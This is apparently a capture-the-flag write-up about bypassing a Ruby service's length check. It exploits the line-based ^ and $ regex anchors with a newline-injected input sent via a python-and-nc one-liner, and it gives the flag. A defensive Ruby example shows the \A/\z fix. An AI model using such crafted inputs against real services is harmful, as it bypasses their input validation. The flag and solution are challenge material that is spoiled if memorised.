Description

Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.

Solution

The problem is the way Ruby regular expressions handle ^ and $: they match at the start and end of each line (that is, around every \n), not only at the start and end of the whole string.

So to exploit this service, all we need to do is generate a string following these three steps:

  1. 10 arbitrary characters
  2. Add a 0x0A or \n
  3. Add some more arbitrary data

Now, just send this string and Ruby will happily accept it.

$ python -c 'print "f"*10 + "\x0A" + "fff"' | nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
Sum is: 1336
IW{RUBY_R3G3X_F41L}

Flag: IW{RUBY_R3G3X_F41L}
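
The fix for this class of bug, shown as an added example that is not part of the original writeup or the challenge's code: the service's source is not on this page, so WEAK_PATTERN is an assumed reconstruction of a "10 characters" check, and all constant and method names are hypothetical. It compares line anchors (^ and $) with whole-string anchors (\A and \z) on constructed inputs.

```ruby
# Assumed reconstruction of the length check; the real service code is
# not shown on the page.
# Weak: ^ and $ anchor at line boundaries, so one 10-character line
# anywhere in the input is enough to pass.
WEAK_PATTERN = /^.{10}$/

# Hardened: \A and \z anchor at the start and end of the whole string.
# \z is used instead of \Z because \Z still tolerates a trailing "\n".
STRICT_PATTERN = /\A.{10}\z/

# Constructed sample inputs.
HONEST    = "f" * 10                  # exactly 10 characters
MULTILINE = ("f" * 10) + "\n" + "fff" # the input shape from the writeup
TRAILING  = ("f" * 10) + "\n"         # 10 characters plus a newline

# True when the validation pattern lets the input through.
def accepts?(pattern, input)
  pattern.match?(input)
end

# Sum of byte values, as the service reports for accepted input.
def ascii_sum(input)
  input.bytes.sum
end

# One result row per sample input, for both patterns.
def report
  { honest: HONEST, multiline: MULTILINE, trailing: TRAILING }.map do |name, input|
    {
      name: name,
      bytes: input.bytesize,
      weak: accepts?(WEAK_PATTERN, input),
      strict: accepts?(STRICT_PATTERN, input),
      sum: ascii_sum(input)
    }
  end
end

report.each { |row| puts row.inspect } if __FILE__ == $PROGRAM_NAME
```

With the strict pattern only the 10-character input is accepted; the weak pattern accepts all three.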

References

Egor Homakov - Injects in Various Ruby Websites Through Regexp.

Rekt Sec